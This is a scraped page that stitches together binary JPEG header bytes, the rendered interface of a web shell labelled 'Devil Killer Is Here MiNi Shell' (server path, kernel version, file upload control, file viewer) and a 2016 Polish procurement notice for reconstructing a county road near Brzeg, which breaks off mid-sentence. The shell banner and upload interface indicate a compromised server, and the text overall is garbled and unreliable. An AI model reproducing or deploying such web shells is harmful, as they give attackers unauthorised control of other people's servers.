JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160219/38150-N-2016.html

<p class="kh_header"><b>Brzeg: PRZEBUDOWA WRAZ Z BUDOWĄ INFRASTRUKTURY
          DROGI POWIATOWEJ NR 1174 O I 1175 O ŁUKOWICE  
          BRZESKIE - BRZEG - I ETAP ODC.ZIELĘCICE - BRZEG 
          OD KM 6+000 DO KM 10+704,25</b><br>
<b>Numer ogłoszenia: 38150 - 2016; data zamieszczenia: 19.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA WRAZ Z BUDOWĄ INFRASTRUKTURY
          DROGI POWIATOWEJ NR 1174 O I 1175 O ŁUKOWICE  
          BRZESKIE - BRZEG - I ETAP ODC.ZIELĘCICE - BRZEG 
          OD KM 6+000 DO KM 10+704,25.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy drogi powiatowej 
               nr 1174 O Łukowice Brzeskie - Brzeg na nw. odcinkach od km  6+000 
               do km 10+ 704,25 o długości 4 km 520,60 m z wyłączeniem odcinka przy 
               wiadukcie kolejowym i skrzyżowania  z drogą krajowa nr 94 . 
               Zakres robót obejmuje m.in.:
               - roboty rozbiórkowe,
               - roboty ziemne, 
               - budowę i remont  kanalizacji deszczowej z wbudowaniem separatora,
               - budowę zatok autobusowych z peronami,
               - przebudowę kolizji oświetlenia drogowego,
               - wymianę lamp oświetlenia drogowego
               - przebudowę linii teletechnicznych
               - budowę i przebudowę chodnika,
               - odbudowa rowów,
               - przebudowę zjazdów i przepustów pod drogą,
               - poszerzenie jezdni,
               - roboty nawierzchniowe w tym ułożenie warstwy ścieralnej z SMA,
               - ustawienie barier  energochłonnych na przepustach i  poręczy zabezpieczających
                 przy chodniku,
               - wykonanie oznakowania pionowego i poziomego zgodnie z projektem docelowej 
                 organizacji ruchu,
               - utwardzenie poboczy.
Szczegółowy zakres robót związany z realizacją  robót zawarty jest w przedmiarach 
               robót, w dokumentacji  projektowej, specyfikacjach technicznych wykonania
               i odbioru robót  - stanowiących załączniki do siwz.           
   Zgodnie z art.30 ust.4 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne 
              opisywanym w dokumentacji projektowej i pozostałych załącznikach do siwz pod 
              warunkiem że oferowane materiały lub rozwiązania równoważne zagwarantują 
              realizację robót w zgodzie z pozwoleniami na przebudowę oraz uzyskanie  
              parametrów technicznych nie gorszych od założonych w dokumentach 
              przetargowych.
              Wykonawca, który powołuje się na rozwiązania równoważne z opisywanym przez 
              Zamawiającego jest obowiązany wykazać, że oferowane przez  niego roboty 
              budowlane spełniają wymagania określone przez   Zamawiającego(art.30 ust.5 
              ustawy Pzp).
              W takim przypadku Wykonawca składa wraz z ofertą oświadczenie, że oferowane 
              przez niego roboty budowalne spełniają wymagania określone przez Zamawiającego 
              w opisie przedmiotu zamówienia. 
    Wynagrodzenie Wykonawcy ustalone na podstawie oferty jest wynagrodzeniem
             kosztorysowym i ma charakter wstępny. Wykonawca dokonana wyceny oferty
             w oparciu o analizę wszystkich materiałów udostępnianych przez Zamawiającego
             tj. przedmiar robót , dokumentację projektową, STWiORB , obowiązki określone
             przez Zamawiającego uwzględniając w cenach jednostkowych wszystkie koszty 
             związane z realizacją zadania w tym koszty organizacji placu budowy 
             wynikające z uzgodnień koszty nadzorów branżowych wymaganych  przez 
             administratorów sieci i inne  nie wymienione. 
             Ostateczna wysokość wynagrodzenia ustalona zostanie   na   podstawie dokonanych  
             obmiarów powykonawczych robót sprawdzonych przez Inspektora  Nadzoru
             i zatwierdzonych przez  Zamawiającego przy  zastosowaniu cen jednostkowych 
             zawartych w kosztorysie ofertowym Wykonawcy. 
             Ceny jednostkowe określone  w kosztorysie ofertowym  nie będą podlegały 
             jakimkolwiek zmianom  w trakcie trwania umowy.              
   §Organizacja ruchu. Prowadzenie robót na drodze powiatowej  zgodnie 
            zatwierdzonym projektem czasowej organizacji ruchu drogowego  z dnia 09.02.2016r.
            KD.7121.11.2016
            Wykonawca ma obowiązek  przesłania pisemnego zawiadomienia o terminie  
            wprowadzenia czasowej  i stałej organizacji ruchu Wydziału Komunikacji 
            Starostwa Powiatowego co w Brzegu, Komendy Powiatowej Policji w Brzegu
            co najmniej na 7 dni przed jej wprowadzeniem.        
   W ramach wykonania zamówienia wykonawca zobowiązany jest również do:
             1) opracowania planu zapewnienia jakości PZJ i planu BIOZ,
             2) opracowania harmonogramu rzeczowo- terminowo -finansowego    
                 uwzględniającego wykonanie  przedmiotu umowy w terminie do 14 października
                 2016r. z podziałem na poszczególne  elementy(części)  do odbioru częściowego, 
                 łącznie z terminem wykonania tych części oraz ich cenami wynikającymi 
                 z załączonego do oferty kosztorysu i przedstawienie Zamawiającemu do 
                 zatwierdzenia po zaakceptowaniu przez Inspektora Nadzoru w ciągu 14 dni
                 od dnia podpisania umowy, 
            3) wykonania i utrzymania oznakowania robót oraz rozbiórki po ich zakończeniu 
                robót,
            4) organizacji placu budowy,        
            5) pokrycia wszelkich kosztów związanych z pełnieniem nadzorów branżowych
               wymaganych przez administratorów sieci wraz z ich  powiadomieniem 
               w terminach wynikających z  uzgodnień o zamiarze rozpoczęcia robót ,
           6) wykonania pomiaru geodezyjnego powykonawczego, 
           7) sporządzenia operatu kolaudacyjnego.
  Zaleca się , aby Wykonawcy  dokonali  wizji lokalnej terenu, którego dotyczy 
           zamówienie  oraz zdobył wszelkie informacje niezbędne do przygotowania oferty                         
           i podpisania umowy.
  Materiały użyte (wbudowane) do wykonania przedmiotu zamówienia powinny
           odpowiadać co jakości wymaganiom określonym w ustawie z dnia 16 kwietnia
           o wyrobach budowlanych (tekst jednolity : Dz. U. z 2014r. poz.883 z późn.zm.) 
           oraz wymaganiom określonym w  dokumentacji oraz STWiORB. Dla zastosowanych
           materiałów Wykonawca przedkłada Zamawiającemu: certyfikaty zgodności  z CE
           lub aprobaty techniczne do odbioru końcowego zadania.
 Utylizacja odpadów. W trakcie wykonywania robót należy przestrzegać Ustawy 
           z dnia 14 grudnia  2012r. o odpadach (Dz. U. z 2013r. poz.21 z późn.zm.)   
Na wykonane roboty Wykonawca udzieli gwarancji  jakości na okres min. 36 m-cy 
           od daty odbioru końcowego. 
           Okres gwarancji stanowi jedno z kryteriów oceny ofert:
           - minimalny wymagany okres gwarancji jakości wynosi            36 m-cy
           - maksymalny deklarowany okres gwarancji  jakości wynosi     60 m-cy.      
          Okres rękojmi za wady  wynosi 36 miesięcy od daty odbioru końcowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.32.22-1, 45.20.00.00-9, 45.11.10.00-8, 45.23.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 
 58.000,00 PLN słownie: pięćdziesiąt osiem tysięcy 00/100 złotych.

1)wadium może być wniesione w następujących formach:
        a) pieniądzu ;
        b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-   
                        kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
       c) gwarancjach bankowych;
       d) gwarancjach ubezpieczeniowych;
       e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5    
        pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju       
                       Przedsiębiorczości (Dz. U. z 2014r.poz.1804 oraz z 2015r. poz.978  i 1240).

wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący 
             rachunek Zamawiającego: w BS Grodków-Łosiów nr konta 48 88700005 2001 
                 0031 8697 0001 z dopiskiem: Wadium  na  przetarg: Przebudowa wraz
                 z budową infrastruktury drogi powiatowej Nr 1174 O i 1175 O  Łukowice 
                 Brzeskie - Brzeg - I etap  odc. Zielęcice - Brzeg od km 6+000 do km    
                 10+704,25
                 Do oferty należy dołączyć oryginał lub kopię polecenia przelewu, potwierdzoną     
                 za zgodność z oryginałem.
              2)wadium wnoszone w innych dopuszczonych przez ustawę Pzp formach należy     
                 złożyć w: oryginał wraz z oryginałem oferty (nie spięte z ofertą).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi  wykazać, że  posiada doświadczenie polegające na 
                                na wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed 
                                upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
                                jest krótszy - w tym okresie, co najmniej  dwie roboty budowlane 
                                w zakresie budowy, przebudowy  remontu drogi o wartości  brutto nie 
                                mniejszej niż 3 500 000,00  PLN - każda (słownie: trzy  miliony pięćset 
                                złotych 00/100)  w tym każda robota budowlana musi zawierać 
                                co najmniej :
                                -  ułożenie  10 000 m2  w-wy ścieralnej z  SMA , 
                                -  budowę przebudowa lub remont kanalizacji deszczowej min.200 m,
                            2)jeżeli wykonawca będzie wykazywał  poleganie na doświadczeniu 
                               innego podmiotu z art.26 ust.2b ustawy Pzp - to musi wykazać 
                               min. 2 roboty budowlane  jak  w § 6.2.1. pkt.1 swiz     
                             Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                             złożonych oświadczeń  dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca(lub partnerzy konsorcjum łącznie)musi wykazać, że dysponuje 
                              lub będzie dysponować niżej wymienionymi w pełni  sprawnymi     
                              jednostkami sprzętu i środkami transportu  zapewniającymi  wykonanie 
                              zamówienia  co najmniej:
                              - koparka samojezdna                                                     - 1 szt
                              - piła do cięcia asfaltu                                                     - 1 szt
                              - płyta do zagęszczania                                                   - 1 szt
                  - frezarkę o szer.min.1,0 m                                            -  1 szt
                              - skrapiarkę                                                                    -  1 szt
                              - układarka do mas bitumicznych                                  -  1 szt      
                              - walec do mas bitumicznych                                        -  2 szt
                              - samochody samowyładowcze min.15 Mg 
                                z przykryciem lub termosy                                          -  3 szt
                             lub  posiada pisemne zobowiązanie innego podmiotu do udostępnienia ww.   
                             jednostki sprzętu na okres korzystania z nich przy wykonywaniu      
                             zamówienia.
                             Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                             złożonych oświadczeń dokumentów  na zasadzie  spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże,
                             że dysponuje lub będzie dysponował  co najmniej:
                 1)kierownik budowy - 1 osoba - min. 5 lat  stażu pracy i min. 3 lata  
                    pracy na tym stanowisku od uzyskania uprawnień,  
                                   - uprawnienia budowlane do kierowania robotami w branży drogowej
                 2)kierownik robót kanalizacyjnych - 1 osoba - min. 5 lat  stażu pracy 
                     i min. 3 lata  pracy na tym stanowisku od uzyskania uprawnień,  
                                    - uprawnienia budowlane do kierowania robotami w branży wodno-
                                      kanalizacyjnej.
                            Uwaga : okres 3 letniego doświadczenia zawodowego będzie liczony jako suma ilości 
                                            m-cy  w których osoba faktycznie kierowała robotami.

                            Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                            złożonych oświadczeń dokumentów  na zasadzie  spełnia
nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że             
                               znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
                               wykonanie zamówienia przez przedłożenie informacji banku lub  
                               spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca 
                               posiada rachunek, potwierdzającej wysokość posiadanych środków 
                               finansowych lub zdolność kredytową Wykonawcy, wystawioną nie 
                               wcześniej niż 3 miesiące przed upływem terminu składania ofert - 
                               minimum posiadanych środków finansowych lub zdolność kredytową
                               w wysokości 2 000 000,00 PLN, (słownie: dwa miliony złotych 00/100),                         2)jeżeli wykonawca polega na zdolności finansowej innego podmiotu
                            na zasadzie podanej w art.26 ust.2b ustawy Pzp należy przedłożyć                              
                            informację, o której mowa w § 6.2.4. pkt.1  siwz dotyczącą tego podmiotu,
Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                         złożonych oświadczeń  dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OFERTA- wg załączonego wzoru do wypełnienia - zał. nr 1,
             2)KOSZTORYS OFERTOWY- wg załączonego wzoru do wypełnienia- zał. nr 2,
              3)zaakceptowany WZÓR  UMOWY - zał. nr 3,
     4)zaakceptowana KARTA GWARANCYJNA- zał. nr 4,
              5)oświadczenie nr 4 - zał. Nr 12
              6)druk  dotyczący podwykonawstwa zał. nr  13,
              7)pełnomocnictwo do podpisywania oferty reprezentacji o ile prawo do   
                 podpisywania, reprezentacji nie wynika z innych dokumentów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja jakości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o okres, w którym roboty
    nie będą mogły być wykonywane z powodu :
    - niekorzystnych warunków atmosferycznych  uniemożliwiających prawidłowe wykonanie tych   
      robót, gdy to wynika z technologii ich wykonania,
- działania siły wyższej (np. klęski żywiołowej, powódź, strajk), mające bezpośredni wpływ na      
  terminowość  wykonywania robót,
- wystąpienia zmiany w dokumentacji projektowej dokonanej na wniosek Wykonawcy lub    
   Zamawiającego bądź Inspektora Nadzoru , konieczności usunięcia błędów w dokumentacji 
   projektowej lub specyfikacji  technicznej wykonania i odbioru robót, 
- wystąpienia robót dodatkowych, zamiennych,
- wstrzymaniem robót z przyczyn niezależnych od Wykonawcy przez uprawniony organ,
   - udzielenia zamówienia dodatkowego powodującego wstrzymanie zamówienia podstawowego,
- koniecznością usuwania kolizji, usterek, awarii, napraw uzbrojenia podziemnego, nadziemnego
  przez ich użytkowników wstrzymujących realizację zadania,
- wystąpienia innych przyczyn niezależnych od Wykonawcy mających wpływ na realizację robót.
Przedłużenie terminu wykonania umowy 
  nastąpi na podstawie pisemnego aneksu do umowy, sporządzonego na pisemny  
    umotywowany  wniosek Wykonawcy, po zaakceptowaniu go przez Inspektora Nadzoru z ramienia
    Zamawiającego.

Wynagrodzenie Wykonawcy ma charakter  wynagrodzenia kosztorysowego i zostało  
    wyliczone w oparciu o kosztorys ofertowy na podstwie przedmiaru robót, dokumentacji,  
    wytycznych STWiOR  z uwględnieniem wszystkich dodatkowych kosztów jakie musi ponieść
    Wykonawca w trakcie realizacji przedmiotu umowy w tym m.in. :kosztów organizacji budowy,
    dodatkowego oznakowania i  zabepieczenia dojazdów do posesji, nadzorów branżowych.Ilości robót określone w przedmiarze robót są  ilościami szacunkowymi.Ostateczne ilości robót
    będą ustalone  na podstawie obmiarów potwierdzonych przez Inspektora Nadzoru Inwestorskiego.
Ostateczna wysokość wynagrodzenia ustalona   zostanie  na   podstawie dokonanych  obmiarów 
